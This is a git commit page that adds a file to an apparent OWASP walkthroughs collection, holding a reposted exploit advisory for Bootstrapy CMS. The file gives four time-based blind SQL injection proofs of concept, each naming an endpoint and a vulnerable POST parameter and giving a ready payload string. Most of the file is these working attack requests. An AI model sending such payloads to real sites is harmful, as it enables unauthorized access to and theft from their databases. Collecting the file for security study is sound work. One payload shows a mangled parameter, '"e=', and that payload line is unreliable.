initial commit
This commit is contained in:
36
Walkthroughs/OWASP2021/vuln-and-outdated/46590
Normal file
36
Walkthroughs/OWASP2021/vuln-and-outdated/46590
Normal file
@@ -0,0 +1,36 @@
|
||||
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
|
||||
# Date: 21.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: http://bootstrapy.com
|
||||
# Demo Site: http://bootstrapy.net/demo/
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
|
||||
----- PoC 1: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/forum-thread.php
|
||||
Vulnerable Parameter: thread_id (POST)
|
||||
Attack Patten:
|
||||
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
|
||||
|
||||
----- PoC 2: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/pages/contact-submit.php
|
||||
Vulnerable Parameter: subject (POST)
|
||||
Attack Pattern:
|
||||
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
|
||||
|
||||
----- PoC 3 - SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
|
||||
Vulnerable Parameter: post-id
|
||||
Attack Pattern:
|
||||
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1
|
||||
|
||||
----- PoC 4 - SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
|
||||
Vulnerable Parameter: thread-id (POST)
|
||||
Attack Pattern:
|
||||
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
|
||||
Reference in New Issue
Block a user